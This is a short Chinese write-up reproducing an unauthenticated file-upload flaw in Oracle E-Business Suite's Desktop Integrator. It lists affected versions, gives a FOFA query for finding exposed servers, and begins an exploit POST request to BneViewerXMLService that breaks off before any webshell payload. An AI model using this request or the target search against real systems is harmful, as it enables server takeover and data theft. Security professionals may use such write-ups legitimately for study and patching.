0x01 产品简介
Oracle E-Business Suite(电子商务套件)是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。
0x02 漏洞概述
Oracle E-Business Suite 的 Oracle Web Applications Desktop Integrator 接口BneViewerXMLService处存在任意文件上传漏洞,未经身份验证的攻击者通过上传恶意的webshell文件,获取服务器权限。
0x03 影响范围
Oracle Web Applications Desktop Integrator 12.2.3-12.2.11版本
0x04 复现环境
FOFA:app="Oracle-E-Business-Suite"
0x05 漏洞复现
Exp
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User